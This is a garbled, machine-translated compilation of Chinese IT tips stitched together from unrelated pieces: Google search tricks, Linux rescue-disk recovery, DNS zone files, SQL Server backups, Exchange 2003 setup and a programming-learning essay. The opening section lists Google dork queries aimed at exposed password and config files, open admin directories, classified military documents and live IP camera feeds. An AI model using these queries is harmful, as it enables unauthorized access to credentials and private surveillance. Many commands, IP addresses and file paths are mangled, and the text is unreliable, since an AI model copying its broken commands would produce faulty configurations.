Too strong a.. using various google breakthrough to download you want blocked.. down ~ ~. 7 TCP Echo 简单 TCP/IP 服务
First. .
In the search box enter: "index of/" inurl: lib.
. .
Then press the search you will enter a lot of libraries, and will be able to download their favorite books.
. .
In the search box enter: "index of/" cnki.
. .
And then search you can find many libraries CNKI, VIP, 1987a entrance!.
. .
In the search box enter: "index of/" ppt.
. .
And then search you can break through the Web portal to download powerpint works!.
. .
In the search box enter: "index of/" mp3.
. .
And then search you can break through the Web portal to download the mp3, rm, and so video works!.
. .
In the search box enter: "index of/" .s **.
. .
And then search you can break through the Web portal to download the flash works!.
. .
In the search box enter: "index of/" to download the software.
. .
And then search you can break through the Web portal to download the software!.
. .
Note quotation marks should be in English!.
. .
Then that way, if you enter:.
. .
“index of /” AVI 。.
. .
Supplement on the second.
See the world with GOOgle!!! If you enter in GOOGLE in specific keywords, you can search the thousands of Camera's IP address! Through his photo you can see its real-time image!!. .
Enter in google.
inurl: "viewerframe? mode =". .
。.
Open a random, and then press the prompt installation of a plug-in, you can see!!!. .
。.
Supplemented on the third one. .
3 the hacker's introduction to the Google search tips.
As we all know, Google is undoubtedly the world's most powerful search engine. However, in the hands of hackers, it is also a secret weapon, you can search some unexpected information. CCID editor to a simple conclusion that they were not hoping for you to use him to attack others for Wang Zhan, but to use these techniques to the vast network of information, to a needle in a haystack, looking into the information useful to you. .
。.
If you are a regular Internet users, you can use hacking techniques to expand their horizons, improve their search efficiency; If you are a webmaster, you quickly see if your site is doing a good job of detecting the following means of hacking preventive measures, if not hurried to a remedy, after all, is better than hidden fire, prevention is better than disaster relief; If you are a hacker, I believe you are back to hacker sites seen in other similar methods, this article you are not useful skill here, you are pediatrics, rookie class! You can save valuable time doing something more meaningful, you do not read this article, go elsewhere! . .
。.
Based on the above considerations I have compiled and distributed this article. .
。.
Search URL. .
。.
For instance, we submit this form: passwd. . Txt site: virtualave. . Net. .
。.
See? Is not that amazing! Many based on CGI / PHP / ASP message board type of the existence of such problems. Sometimes we even get the password or codes of! Administrator may be responsible too, and perhaps bad sense of security precautions, if you are a network administrator, quickly check Do not allow a malicious attacker to pick up cheap. Do not put too much DES encryption, even if the password through the DES encrypted passwords, hackers can still break through the many software buttoned. .
。.
. .
。.
. .
。.
This time we can get the file containing the password. "Site: virtualave.. Net" means that only the search virutalave. . Net's URL. virutalave. . Net is a network server provider. .
。.
Similarly, we can search a number of top-level domain, such as:. . Net. . Org. . Jp. . In. . Gr. .
。.
config. . Txt site:. . Jp. .
。.
admin. . Txt site:. . Tw. .
。.
Search Home directory. .
。.
Home is very useful, it will provide to you a lot of useful information. .
。.
We submit the following form:. .
。.
"Index of / admin". .
。.
"Index of / secret". .
。.
"Index of / cgi-bin" site:. . Edu. .
。.
You can define your search of the home character. So you get a lot of information. .
。.
Search for specific file types. .
。.
For example, you want to specify a file type, you can submit the following form:. .
。.
file is invalid:. . Doc site:. . Mil classified. .
。.
This is the search for military information, you can customize the search. .
To provide a fourth article.
. .
Google's special features.
1, the query number. .
Google search bar in the latest to join a phone number and street address information.
Individuals who wish to find these lists, as long as the complete name, city and province. .
If the information to light, and you will be in the search results page to see the search at the top of the phone and street address.
You can also find it by any of the following list:. .
First name (or first uppercase letter), surname, telephone area code.
Name (or the first capital letter), last name, zip code. .
First name (or first uppercase letter), last name, city (writable).
Name (or first capital letters), name, state. .
Phone number, including area code.
Name, city, state. .
Name and zip code.
. .
2. Locate the PDF file.
GOOGLE's search results now include a PDF file. Although PDF files as HTML files so much, but they often have a number of other documents do not have high-quality information. .
In order to display a search result is a PDF file instead of a Web page, the title of the PDF file is displayed in blue text at the beginning.
This is to let you know ACRTOBAT READER program will start to read the file. .
If your computer is not equipped with this program, the computer will guide you to be free to download the program's Web page.
Use PDF file, related web page snapshot from the "TEXT VERSION" instead, it is the PDF document, copy files, the file to remove all the formatting commands. .
If you do not have PDF link to see a series of search results, as long as the search bar on-inurldf plus your search criteria.
. .
3. stock quotes.
Use Google to find stock and mutual fund information, just enter one or more NYSE, NASDAQ, AMEX, or. .
Mutual fund quote code automatic recorder, you can also enter in the name of the company's stock account.
If Google recognizes your query, the stock or mutual fund, it will link back directly to the high-quality financial information providers to provide information on stocks and mutual funds. .
In the beginning of your search results appear in your query, the stock market ticker code. If you want to find a company name (for example, INTEL), please see the "stock quotes" in Google search results will have financial column for that company's home page link (for example, WWW. .INTEL. .COM).
Google is the basis of quality to choose and decide on financial information providers, including the factors that have download speed, user interface and functionality. .
。.
4, find who you link. .
Some words with a colon will have a special meaning. Such as the link: operator. The query link: siteURL, it will display all point to the URL of the page. For example, link www. .Google. .com will ask you to show all links to the GOOGLE home page. But this approach cannot be used in conjunction with the keyword query.
. .
5. Locate the site.
If connected to the colon site behind the words can limit your search to a particular site. Specific approach: use search bar in the c site: sampledomain. . Com this grammatical structure. For example, at Stanford looking for information, enter:. .
admission site:www。.stanford。.edu 。.
. .
6. the interpretation of the lookup dictionary.
Interpretation of the method to find a dictionary in the search box type in your query. In our request to find all of the dictionary will be marked with underline Interpretative at the top of search results, click on the link you will find the dictionary providers related to the definition given on request. 7, with GOOLGE find the map. .
Want to use Google to find street maps, Google search bar, enter a u.s. street address, including zip code or city/state (such as 165 University Avenue, PALO ALTO CA). Typically, the street address and city name is sufficient.
When Google recognize your request is to find the map, it will get back to you with high quality links to map providers, so you just find the relevant map. We are quality-based selection of these map providers. It is noteworthy that Google and the use of the map without any associated information providers. .
1. using the rescue disk set for maintenance.
Rescue disk set (also known as the boot / root disk group), is an indispensable tool for system administrators. It could be used independently start and run a full Linux system. In fact, the rescue disk group in the first two disks have a complete Linux system, including the root file system; the first one bootable disk is stored in the kernel. .
Use the emergency disk group maintenance system is very simple. You only need to use the disk to boot the system, the emergency mode when using the root account. In order to be able to access the files on the hard disk, you need to manually install the hard drive file system. For example, use the following command to install/dev/hda2/mnt directory on the disc type of the ext2fs file system: Linux.
# Monut-t ext2/dev/hda2/mnt. .
Note: now that the root directory is the root of the emergency disk. In order to access the hard disk in the file system, you must first install it into a directory. Thus, if the file system on a hard drive installed in the directory, then/mmt hard disk original/etc/passwd file path is/mnt/etc/passwd.
2, the file system is destroyed approach. .
When the file system is damaged, if you are using the ext2fs file system types, from floppy disk shipped e2fsck command to fix the file system was corrupted data. For other types of file system, you can use the corresponding fsck command. When you check the file on the floppy disk from the system, it is best not to mount installation.
Note: The file system is a common cause of damage is the super block is damaged, file system super block is the "head." It contains the status of the file system, size and free disk blocks and other information. If the damaged file system super block (such as careless write data directly to the file system super-block partition), then the system may not recognize the file system completely, it also can not install it, even if the use of e2fsck command can not address this issue. .
However, the ext2fs file system type super block of content will be backed up and stored in the driver's block (block group) boundaries. You can use the following command tells e2fsck use superblock backups.
. .
# e2fsck -b 8193 。.
Refers to the file system where the partition,-b 8193 option is used to display stored in the file system used in the 8193 super-block backup data. .
3, recover lost files.
If you do not accidentally delete important files, then there is no way to direct recovery. However, the corresponding documents can also copied from the rescue disk to the hard disk. For example, if you delete the file / bin / login, the system can not be normal at this time into the login screen, you can start the system with the rescue disk set, the hard disk file system is installed to the / mnt directory, then use the following command:. .
。.
# Cp-a / bin / login / mnt / bin. .
"-A" option is used to tell cp copies to maintain file access permissions. Of course, if you delete the basic files are not in the "first aid disk group", you cannot use this method. If you previously did a backup of your system, then it can also be used to restore a previous backup.
4. Library destroyed approach. .
If you accidentally set the system function library file damaged or destroyed/lib directory symbolic links, it will lead to rely on these library command cannot be executed. The simplest solution is to use the emergency disk set to boot the system, install the hard drive/mnt directory file system, and then fix/mnt/lib directory library.
5, can not use root account login system. .
As a result of negligence on the part of the system administrator, or because the system against hacker intrusions, system administrators may not be able to use the root account login system. ".
For the first case 1, may be the system administrator forgot root password, use the rescue disk groups can solve the problem. .
For the second case, as may be modified by a hacker, so system administrators cannot enter the system, that is, the Linux system is completely out of control, it shall, as soon as possible, to regain control of the system. After obtaining a root permissions, you should also check your system corruption, prevent hackers from invading again.
Need to do the main job is to reset the root password, control access to Linux operating system. First, start the system with the rescue disk set, and then install the hard disk file system to / mnt directory, edit the / mnt / etc / passwd file, the corresponding line in the root account encrypted password field blank, as follows:. .
root::0:0:root:/root:bin/bash 。.
Note: If your system uses shadow tool, you need the file / etc / shadow to carry out such operations, so that the system does not require root login password. .
Thus, there is no password for the root account. When you boot from the hard drive when a Linux system, you can use the root account login (the system does not require you to enter a password). Enter the system, and then use the command passwd set a new password.
6, Linux system can not boot. .
Generally speaking, if the system administrator does not enter the system, you need to consider using a first aid disk group emergency mode troubleshoot system failures. But in the absence of making emergency disk set of Linux system does not start, what should I do?.
A personal computer using the Linux system, usually Linux and MS Windows 9x or MS Windows NT co-exist. As the re-install other operating systems, often resulting in the original Linux can not boot. This is mainly because these operating systems default to the computer no operating system, which changed the hard drive's master boot record (MBR), obliterated the Linux's LILO bootloader. .
If you have a first aid disk group, it is very simple, first boot hard disk Linux system, rerun LILO command, you can use LILO boot program written back to the hard disk's master boot record. Power on again.
If there is no boot disk, how to restore your hard disk Linux? In this case, if you know the exact Linux installed on the hard disk partition, and there loadlin program, you can return to Linux. loadlin program is under the DOS program, run it directly from DOS, boot Linux, quick access to Linux environment. In Red Hat Linux 6. .0 CD dosutil / directory will have this procedure. In addition, it requires a Linux kernel boot image file. In Red Hat linux 6. .。.
For example, in Windows 98 system the following into the DOS single-user mode, then run the following loadlin command, you can re-enter the Linux system:. .
loadlin vmlinuz root=/dev/hda8 。.
/ Dev/hda8 is Linux's root file system location where the hard disk partition. After the execution, the boot Linux. With the root login, run the LILO command, then re-LILO into MBR, back before the coexistence of multiple operating systems use state. .
RAID Simulator.
In fact, in forums, that the disk array configuration of users much more than the above this one, for this situation, the writer on to a server's disk array configuration examples to highlight the specific disk array configuration. Of course, the specific array controller of different methods may not exactly the same configuration, but most of the basic steps are the same, can refer to. .
When it comes to disk array (RAID, Redundant Array of Independent Disks), now almost by must master the art of, in particular small and medium-sized enterprises, since the disk array application, it is the current backup is one of the main programme. However, many by just in various media see the relevant theoretical knowledge, but did not see some actual disk array configuration method, so I still have to own a real configuration, but start. . Of course, the disk array in order to make you a more comprehensive introduction, or first to a brief look at the disk array of theoretical knowledge, so the actual configuration can be found theoretical basis. .
First, the disk array implementations.
Disk array can be achieved in two ways, that is, "Software RAID" and "hardware array." .
Software array refers to by network operating system itself provides disk management features will connect normal SCSI cards on multiple hard drives configured as a logical disk that made up the array. As Microsoft's Windows NT/2000 Server/2003 Server and NetWare NetVoll of two operating systems can provide software array functionality, including Windows NT/2000 Server/Server 2003 provides RAID 0, RAID 1, RAID 5, NetWare operating system can implement RAID 1. . .
The hardware array is to use a dedicated disk array cards, this is the introduction to this article. Now the non-entry server is almost always provide disk array cards, whether it is integrated on the motherboard or non-integrated can easily achieve the array function. The hardware array to provide online capacity expansion, dynamically modify the array level, automatic data recovery, drive roaming, Super cache and other functions. It can provide the performance, data protection, reliability, availability, and manageability solution. . Thus, the operation of the disk on the server directly through the disk array card to be processed, so do not need a lot of CPU and system memory resources, will not reduce the performance of disk subsystems. Array card processing unit to carry out specific operations, its performance is much higher than conventional non-array drives, and more secure and stable. .
Second, several disk array technology.
RAID technology is an industry standard, the manufacturer of the RAID levels are not the same definition. RAID levels currently available to the industry's widely accepted definition of a 4, RAID 0, RAID 1, RAID 0 +1 and RAID 5. .
RAID 0 is not a data-redundancy storage space, with a low cost, read and write performance is extremely high, storage space utilization, applies to audio and video signal storage, temporary file dump on speed is extremely rigorous application of the special. But since there is no data redundancy, which, in any form the array one hard drive damage will be catastrophic data loss. This way there is no redundancy, without security protection, but will increase disk read and write performance and disk capacity of the entire server. . .
RAID 0 +1 combines RAID 0 and RAID 1 the characteristics of independent disks configured as RAID 0, two complete sets of RAID 0 mirror each other. It is good to read and write performance, high security, but the cost of building into a large array of data space utilization is low. .
RAID 5 is the most widely RAID technology. The block independent hard disk striping segmentation, the same article striped parity (XOR), and validate data evenly distributed on each hard disk. To n drives to build RAID 5 array can have n-1 hard capacity, storage space utilization ratio is extremely high. Any piece of data loss on your hard disk, you can validate the data. It and RAID 3 biggest difference is whether to validate data on the distribution of the hard disk. . .
RAID 1, RAID 0 + 1, RAID 5 array with a hot-swappable (also known as hot replaceable) technology, you can recover your data online, that is, when the RAID array in a hard disk is damaged, do not require a user to shutdown or stop using the service, you can replace a failed hard drive data recovery repair systems, on the implementation of highly available systems is of great significance.
Third, the disk array configuration example. .
When the hard drive is connected to the array (RAID), the operating system will not be able to see the physical hard disk directly, so you need to create a one-of is set to RAID0, 1 or 5 of logical disks (also called a container), this system will be able to correctly identify it. Of course, the logical disk (Drive Logic), containers (Container) or virtual disks (Virtual Drive) represents a meaning, just different array card manufacturers in different terms. You can see the following configured servers are Dell Power Edge 7x0 Dell PowerEdge 1650 series and server .
RAID configuration is usually used RAID card BIOS tools, and also use the configuration tools provided by third parties to achieve the array card management, such as the Dell Array Manager. This article is to introduce how to use the DELL server array card BIOS tools disk array configurations. .
If your DELL server using Adaptec disk array controller (PERC2, PERC2/SI, SI and PERC3/PERC3/DI), in the event of a system to post you will see the following information:.
Dell PowerEdge Expandable RAID Controller 3/Di, BIOS V2. .7-X [Build xxxx] (c) 1998-2002 Adaptec, Inc. . All Rights Reserved. . <<
If your DELL server configuration is a piece of AMI/LSI disk array controller (PERC2/SC, DC, the PERC2/PERC3/SC, DC, PERC3/PERC4/DC DI and PERC4/), then the system post time will see the following information:.
Dell PowerEdge Expandable RAID Controller BIOS X. . XX Jun 26. .2001 Copyright (C) AMERICAN MEGATRENDS INC. .
Press CTRL + M to Run Configuration Utility or Press CTRL + H for WebBios or.
PowerEdge Expandable RAID Controller BIOS X. . XX Feb 03,2003 Copyright (C) LSI Logic Corp. .
Press CTRL+M to Run Configuration Utility or Press CTRL+H for WebBios。.
The following two cases above were to be introduced. .
1. The Adaptec RAID controller Raid (container).
In this array, the card follows the steps to create the container (note: Please advance to back up your data on the server, configure the disk array, the process will delete all data on a server hard disk!):. .
The first step, first of all, when the system is in post process (Figure 1) when you are prompted, press "Ctrl + A" keys at the same time. Enter (Figure 2) disk array, as shown in the configuration program interface.
Figure 1. .
Figure 2.
An environment assumption. .
1 two machines, one for LINUX, machine name, the domain name for LINUX tongqiang. 192. .cnIP address .168. .0. .5, another machine for WIN98, machine name, IP address for tongqiang from DHCP servers on Linux for. ..
Second, the establishment of DNS server (assuming your DNS package has been installed and is installed in the installation of LINUX is chosen DNS server). .
Set up a DNS server only needs to modify several files.
1 named. . Boot or named. . Conf (Note: In RedHatlinux5. .2 The following version of the need to modify the named.. Boot, in RedHatlinux5. .2 Or later need to modify the named.. Conf....
Modifications are as follows: (front; means comments).
; Boot file for name server. .
/Var/named directory (specified read from/var/named Directory DNS database file, such as to resolve the file, the reverse resolution files, local files, cache files in this directory).
primary tongqiang. . Cn tongqiang. . Cn. . Db (the primary DNS server specified in the resolution of the domain is tongqiang.. Cn, DNS database file is tongqiang.. Cn.. Db). .
0 .0. primary. .127. .in-addr. .arpa db. .127. .0 .0 .0.. (resolving internal address translation is specified in the DNS database file).
primary 0. .168. .192. . In-addr-arpa db. .0. .168. .192 (Reverse resolution DNS database file specified). .
cache 。. Db. .cache (indicate from internet gets "root" servers address file) 3 respectively to establish individual database files.
A positive resolution to establish DNS database file, enter the directory / var / named. .
vi tongqiang。.cn。.db 。.
(The contents of the file). .
@ IN SOA linux。.tongqiang。.cn 。. root。.linux。.tongqiang。.cn 。. (199511301.
28800. .
7200.
3.6 million. .
86400).
NS linux. . Tongqiang. . Cn. .. .
Mx 10 support。.tongqiang。.cn 。.
Localhost A 127. .0. .0. .1. .
Linux A 192。.168。.0。.5 。.
WWW CNAME linux. . Tongqiang. . Cn. .. .
In the DNS database file, the first row, the DNS server name, the DNS administrator's e-mail address, the digits, the first indicates the version number, each time you modify this file, the version number is simply to put 1. Behind the NS records indicates the domain name server of the domain name itself, an MX record specifies the e-mail address conversion records, A record is the record, which indicates the address from a domain name to IP address of the relationship. CNAME alias record, bring .tongqiang. www. corresponds to the .cn. .tongqiang. .cn linux.
Please note that the above relative and absolute domain name, said that some domain name followed by a dot (.), Plus some behind the no dot (.). Is an alias record and MX record points to add the domain back. . .
2. establish a reverse database analytical files (db. .0. .168. .192).
@ IN SOA linux. . Tongqiang. . Cn. . Root. . Linux. . Tongqiang. . Cn. . (..
199511301.
28800. .
7200.
3.6 million. .
86400).
NS linux. . Tongqiang. . Cn. .
5 PTR linux。.tognqiang。.cn。. 。.
Similar meaning and positive solutions of the above, only PTR record for reverse resolution. . .
3. establishing db .0 .0 .127... .0.
@ IN SOA linux. . Tongqiang. . Cn. . Root. . Linux. . Tongqiang. . Cn. . (..
199511301.
28800. .
7200.
3.6 million. .
86400).
NS linux. . Tongqiang. . Cn. .
1 PTR localhost 。.
Meaning and on the same. . .
4. as regards the db, you can choose from the .cache file ftp. .rs. .internic. .net Download. The downloaded file into a db. .cache.
Three were set up all database files. .
1 establish a forward resolve DNS database file, enter the directory/var/named.
vi tongqiang. . Cn. . Db. .
(Following the contents of the file).
@ IN SOA linux. . Tongqiang. . Cn. . Root. . Linux. . Tongqiang. . Cn. . (199 511 301..
28800.
7200. .
3600000.
86400). .
NS linux。.tongqiang。.cn。. 。.
Mx 10 support. . Tongqiang. . Cn. .
Localhost A 127。.0。.0。.1 。.
Linux A 192. .168. .0. .5. .
WWW CNAME linux。.tongqiang。.cn。. 。.
Above the DNS database file, specify the DNS servers are the first line of the name, DNS administrator's e-mail address, behind the figures, the first of a number specified in the Banben, Meicixiugai finished after going Zeng Jia Ci file version number is Simply add 1 in the above. NS records indicate the back of the domain name server's own domain, MX records indicate the email address change records, A records are address records, specify the domain name to IP address from the corresponding relationship. CNAME is an alias record, the role is to www. . Tongqiang. . Cn corresponds to linux. . Tongqiang. . Cn. .
Please note that in the above relative and absolute domain names domain name, the domain name is followed by a dot (. ), There is no more (later. )。 Is the alias records and MX records for the domain name later to add. ..
2. . To establish a reverse database analysis files (db. .0. .168. .192). .
@ IN SOA linux。.tongqiang。.cn。. root。.linux。.tongqiang。.cn。. ( 。.
199 511 301. .
28800.
7200. .
3600000.
86400). .
NS linux。.tongqiang。.cn。.
5 PTR linux. . Tognqiang. . Cn. .. .
The above meanings and positive solutions to more or less the same, only PTR records used for the reverse resolution...
3 establish db. .127. .0. .0. .0. .
@ IN SOA linux。.tongqiang。.cn。. root。.linux。.tongqiang。.cn。. ( 。.
199 511 301. .
28800.
7200. .
3600000.
86400). .
NS linux。.tongqiang。.cn。.
1 PTR localhost. .
Meaning and. ..
4 As for the db. . Cache files can be ftp. . Rs. . Internic. . Net download. Download the file into db. . Cache can be. .
4. launch and test named.
With ndc start. .
Then use the nslookup command command prompt appears, check the forward entered directly parsing, such as Linux ready queries, such as reverse resolution 192. .168. .0. .5 to resolution. Check the alias and the MX record, enter the cname and set q = q = mx set, and then enter www. .tongqiang. .cn and. ..
5. After modifying the database record must increase the version number, do not forget to modify the reverse analysis file, and then reload the database file with ndc reload. . .
6. This test is very simple, if there is another in the domain of network segments, as well as through ISP connection when accessing the Internet DNS settings see the DNS settings of the supplementary "Enterprise Manager's Tools, Database Maintenance Planner, you can set up the database regularly and automatically backup plan. And start the SQL server Agent to automatically run a backup plan. The steps are as follows:.
. .
1, open the Enterprise Manager, in the console root in turn points to open Microsoft SQL Server--> SQL Server group--> double-click to open your server.
. .
2, and then point the above menu Tools-> Select database maintenance Planner.
. .
3. next, select the text you want to automatically backup data--> next update data optimization information, select the General needs to be done here--> next checks data integrity, and generally do not select.
. .
4, the next step to specify the database maintenance plan, the default is 1 week, click change to select the backup points determine a day.
. .
5, the next step to specify backup disk directory, select specify a directory, where you can create a directory on drive d as: d:\databak, and then choose use this directory, if your database is more than the best option for creating subdirectories for each database, and then select delete faxes older than the number of days before the backup, set of 4-7 days, look at your specific backup requirements, backup file extension, the default is BAK.
. .
6, the next step to specify transaction log backup plan, you have a choice--> next to generate a report, do not generally choose--> next maintenance plan history, it is best to use the default options-> next and finish.
. .
7, completes the system will likely prompt Sql Server Agent service is not started, click OK to complete the project settings, and then locate the desktop to the far right side of the status bar icon, double-click the SQL Green point to open, select the Sql Server service Agent, and then click the run arrow, chosen below when you start the auto-start service when OS.
. .
8, you can set the start start the SQL server Agent Services.: running, set the .msc sqlserverAgent to start automatically.
. .
Revising the plan:.
. .
Open Enterprise Manager, in the console root in turn points to open Microsoft SQL Server--> SQL Server group--> double-click to open your server--> management > database maintenance plans.
Q: In SQL Server 2000 in, how do I back up the database and the way I want to compress the backup, then I should do? . .
A: backup SQLSERVER2000.
Example 1: (backup). .
1 use master 。.
2 declare @ path = 'c: \ aa \ zy. . Bak '. .
3 backup database zy to 。.
4 disk = @ path with noinit. .
Description:.
1 use the system libraries. .
2 set the backup path and file name, that is quoted.
3 need to back up the database. .
4 set your backup drive, set the path to the drive, and then set the backup (rewrite or overlay).
Example 2: (compressed backup of the database file). .
use master 。.
exec xp_makecab 'c: \ m. . Cab ', mszip, 1,' c: \ aa \ zy. . Bak '. .
exec xp_cmdshell ’copy c:\123。.cab’, ’d:\123。.cab’ 。.
Description:. .
' C:\m. .cab, ' the name of a compressed backup.
mszip compression. .
C:\aa\zy .bak '. ' is the path of the compressed file.
Save copy to another directory. .
The conditions required for the installation and the exchange2003 steps in windows2003.
2007-09-19 16:46. .
In windows2003 exchange2003 needs to be installed on the conditions and procedures:.
1, must be installed on NTFS partition exchange2003, and is a domain environment. .
2. install and enable the following components and services.
A, IIS B, WWW C, SMTP D, NNTP. .
E、。.NET Framework F、 ASP。.NET 。.
Start - Run, type "sysocmgr / i: sysoc.. Inf", open the windows components wizard, double-click the "application server", open a window, select the "ASP.. NET, IIS, COM +" These three, Then double-click the IIS, will open a window, select "Internet Information Services Manager, NNTP, SMTP, the World Wide Web (WWW)" - OK go. .
-Click to open the IIS Web service extension, select the window to the right, click the .NET ASP. "allow".
3, the network testing, test tools are: dcdiag and netdiag. .
These two tools in windows server 2003 installation CD.
\ Support \ tools \ suptools. . Msi, where dcdiag. . Exe's role is to test the domain controller's network connection and DNS resolution, netdiag. . Exe's role is to test the workstation and server network connectivity and DNS resolution, if there is no error, the network test successfully. .
4, the installation of exchange 2003.
Insert exchang 2003 CD-ROM will start automatically, click the exchange deployment tools, pop-up a new window, if you install the first exchang 2003 server, then select the "deployment of the first exchang 2003", if not the first exchang , an optional second or other options. .
5. run ForestPrep.
When you select the "deployment of the first exchang 2003", will pop up exchange 2003 deployment tools window, this window lists the installation of exchange 2003 some of the steps necessary, you can combine your own situation, step by step and move on. .
Here, the first five steps we have already done, now do step 6 is running ForestPrep, you must carefully read about running ForestPrep user must have permissions, it is important to Oh, there is another point to note is that ForestPrep in the Woods only once, and recommended that the schema master with, on the schema master can refer to the windows server 2003 Help files.
Click "Run Now ForestPrep", the wizard prompts to complete the installation ForestPrep. .
6. run DomainPrep.
This step should be noted that in addition to rights issues, is that when you have multiple domains and each domain are installed exchange 2003, the then DomainPrep to run once in each domain is different from the ForestPrep. .
Click: "immediately run DomainPrep", according to the wizard prompts to complete the installation of DomainPrep, if you install them warning.
Just in time to delete Pre-windows 2000 Compatible Access security group membership unnecessary. .
You can, this is to ensure the security of the domain.
7, the last is to install exchange 2003. .
Click "run now" to install the program, you can complete the installation of exchange 2003.
8, add a little bit, it is recommended not to exchange server and DC installed on a machine. Programming methodology. .
This program's butterfly yuanzhijia wrote very classic, it is recommended that you take a look. The following is the original:.
Programming methodology. .
-This article focuses only on my own computer science and software professional learning context.
--------------------------。 .
One who doesn't read this article.
----. .
My article is always highly targeted, never as I could not understand what his conservative and ink.
This article naturally no exception. People avoid reading the following categories: Those who want to take a graduate student who do not read, the article with the ideology is not understood your deposition head rot, you should take the time to spend Siken textbooks. Like playing with graphic design in the computer field, web production and all are interested in joining the field of computer software applications who do not read, I will profane your ideal. Likes to play with CPU and memory in the hands, Theory of sphere how to overclocking how lip service to the hardcore computer hardware DIYer who also do not read this article, not that you do not fit this time, but I simply that you read my article is a great insult to me! . .
Beginning to end, rational.
--------------------------. .
What is the second from the start?.
----. .
Many of my friends asked me: what should I start to learn from? I have all said: compilation! this answer, you can't make everyone understand. They said: I also follow textbook followed teacher learned assembly language. Well, I'm from the compilation and analysis of teaching materials, to clarify my understanding of the compilation of learning. We take a closer look at our compilation of materials, it is stated at the outset that, while the Macro Assembler IBM-8086 textbook most deadly poison the best compilation of students is this! believe every learned compilation, are aware that in writing assembler, the most commonly used most dependent on the INT21H. . (Except high-master!) (Here, I introduced myself to express a term - "system relevance.") Therefore, teaching in the declaration itself is system independent of the IBM-8086 Series, while for students to learn of it is a "system-related nature" of DOS assembly, the major mistakes, so the vast majority of students in learning when compiled, noted that the compilation of understanding the language syntax itself, while ignoring related and must essential principles of DOS system, so in the future, use their knowledge acquired during the preparation process, feel a lack of knowledge related to the system, in addition to materials on the example of feeling outside, unable to write their own. .
Our readers, please answer my question is this? it absolutely can not blame the student textbook to blame for their own shortcomings and one-sided. To this end, my prescription is to carefully read and study our DOS half of the book (the Sichuan Union University of the DOS utility technology encyclopedia "), are you seriously after learning it, will have the feeling fades away, and no longer on the DOS system underlying confusion, not feel start it later programming work was fundamental role.
Read here, you must ask me, are learning to program on the DOS system must learn the principle of it? I said, yes, although now the popular WINDOWS, the surface has visible traces of the DOS, however, a general understanding of the WINDOWS system but should be aware of the students, WINDOWS9X use the DOS kernel. Without the knowledge of DOS system, it is difficult to understand WINDOWS9X principles. Moreover, there is no depth profile control WINDOWS9X out the principle of buying books, all of its introduction, is based on the DOS's.。 No DOS system knowledge, it is difficult to understand the core elements of a WINDOWS, or even simply cannot understand. Learn the DOS system knowledge on WINDWOS.
System understanding and learning, is a multiplier. I started from a high of a DOS, DOS freshman carefully studied the system principles, so I can quickly access WINDWOS this world, but the role of DOS in which I simply can not describe in words. .
—————————————————————————— 。.
———— 。.
In the DOS system principle is learning finished, the next step really should consider how the. Because no one is born and long stinking like to use assembly language to write meaningful programs, including me. My advice is C. The first step is TurboC2. .0. There are two reasons: first, a deep understanding of the concept C, on the future of learning is definitely a leading role. Second, TC provides a compilation of the programming interface, which as we have learned to practical use "system-related," a compilation of knowledge, provides a very broad and convenient stage.。.
At this time, the procedure can begin WINDOWS prepared. Once into the Windows programming world that colorful, most have a kind of dazzling feeling. I was it is. Therefore, Windows programming language is particularly important the first. My advice is to VB. Although VB such as deficiencies and defects, (such as running slowly, is an interpreted language, the internal fully closed, etc.) can be VB as entry-level Windows programming language, it should not underestimate the role of the Enlightenment.。 This stage should not be too long, 2-3 weeks, at this point, do not be content with your basic can make some pretty Windows programs, not desperately in VB, because the most beautiful and most attractive of below!.
--------------------------. .
3 a kneeling at the foot of the VC.
----. .
On a real programmer, VC you with General programming enthusiasts divided by marks and VC's world, but the existence of MFC and Win32 API that controversial, although they have the same root. My personal suggestion is: Win32 API is absolute choice! in the Win32 API knowledge areas for a comprehensive explanation of a program in Windwos system. For this level of the program, but you cannot understand, cannot be explained without it. . However, you should have full confidence and determination to adhere to the study, Win32 API programming compilation called Windows systems, so it's wide and deep, should be prepared. Learning time a lot, a fast in calculation. I had contact with it, not believe it to be so much time and energy, may I learned last year and a half. Sign of studies it is: From your play most of the game, you will find that you have not consciously to consider other people's game is how to write the..0, such as Winamp., etc..
Here, I focus on MFC and the Win32 API to talk about the merits of distinction that I believe that many students are vague. If you use VC editor to write a Windows program that uses MFC, then, MFC programming guide can provide some framework for services, makes the procedure established by the initial feeling was very convenient. When the code growth, MFC provides convenience in the early, there is no trace of the. On the contrary, MFC will be a major defect appeared at this time.。 "Students using MFC, you can go to consider how to implement a custom message, for example, multiple threads, use of pallet area, right-click pop-up menu, the owner of the drawing window and menu, the child window subclass and superclass, is extremely troublesome problems I so that you can put forward a lot, but in the Win32 API programming ideas and implementation, these are very logical.
Another, from a compilation point of view the difference between MFC and Win32 API. MFC in the package, most of all class member functions, they are actually using the API function is secondary. MFC-LIB library are packaged into their category code for the call, otherwise, why build Release version, must be set to a static link library? Said to go through, MFC class library API is a subset of MFC to learn better, to understand them even more profound, only indirectly, in the understanding of API, it should begin to learn and use the API. I re-use a metaphor to conclude my comments on the MFC and API.。 The value of this score is conveniently provided by MFC. In the program code is not long, MFC provides the convenience of obvious; but with the growth of the code to facilitate the practical meaning of the value immediately decrease and increase side effects. ” 。.
I am doing a year and a half after the Win32 API programming to learn deeply through it, its principles and Windwos on Windows system programming than ever with quality improvement mechanism, used to understand and fuzzy programming ideas and implementation details, have been well satisfied, they can obviously feel the level of programming to a new level. .
—————————————————————————— 。.
Four broad application of knowledge already. .
———— 。.
To this level, should be able to write these proceedings. Such as write LAN chat program similar to ICQ, write your own FTP uploading and downloading of the network program, write your own screen saver and write. . Too much! I remind you that time not to doubt their own level, not one-sided textbooks superstition, is committed to writing, confidence and passion to write, you will find, that I was also able to make such a good program, before many of his wishes unthinkable things, and now also through their own efforts and achieved. Sometimes do not scrimp on doubt, we can see our young people some ideas, and sometimes I do not know the authority of their teaching materials and clever than the number of times ah! . .
—————————————————————————— 。.
51 more mountain mountain high. .
———— 。.
Learn the Win32 API, so it can not think that they have mastered the essence of technology in the pursuit of unlimited technology, there is no best, only better. I give 12 cases. VxD will it? Prepared based on a system-level CPU-Ring0 DLL, would it? These are Windows system, the content of profound, not only does not appear in books on the market can be seen, even documentation are MicroSoft has released the English version. For example Windwos9x series DDK documentation. Anti-virus software, technical principles on this level, CIH. .
The virus also at this level. Antivirus real-time monitoring of the "" principle is based on the underlying file system interruptions early interception and processing technology. Then, on the understanding of the network should be went to new heights. Not content to simply use a network programming interface, you should try to understand the TCP/IP Protocol, to understand the FTP, HTTP, POP3, SMTP, and so on each of them is located in the Internet, go to writing your own programs for various network services. The principle was OICQ at this level.
--------------------------. .
